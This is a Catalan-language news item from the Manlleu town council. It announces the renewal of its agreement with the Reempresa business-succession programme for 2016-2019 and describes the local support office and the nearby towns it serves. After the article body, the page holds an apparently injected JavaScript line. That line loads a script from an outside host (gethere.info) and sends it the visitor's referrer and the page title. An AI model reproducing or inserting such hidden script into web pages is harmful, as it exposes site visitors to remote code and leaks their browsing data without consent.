• Inici
  • Butlletí
  • L’Ajuntament de Manlleu renovarà el conveni de col·laboració amb el programa Reempresa per al període 2016-2019

L’Ajuntament de Manlleu renovarà el conveni de col·laboració amb el programa Reempresa per al període 2016-2019

L’Oficina de Promoció Econòmica (OPE) és un punt d’atenció Reempresa des del 2013.

Reempresa és un nou model d’emprenedoria i de creixement empresarial: un mecanisme pel qual una persona emprenedora pren el testimoni en la gestió d’una empresa ja existent, comprant-la en la seva totalitat per continuar l’activitat, enlloc de crear-la des de zero. S’implementa a través de la creació d’un mercat ben estructurat, definit i formal, on es troben l’oferta i la demanda per a la cessió d’empreses d’èxit en un únic portal web.

 

 

La signatura del conveni per als propers quatre anys significarà la consolidació del servei d’acompanyament a les empreses que es volen cedir i a les persones emprenedores que les volen continuar. A més a més, des del punt local de Manlleu, es donarà servei als municipis que formen part de la Vall del Ges, el Collsacabra, el Voltreganès, Roda de Ter i Les Masies de Roda.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

A Manlleu
Fem Xarxa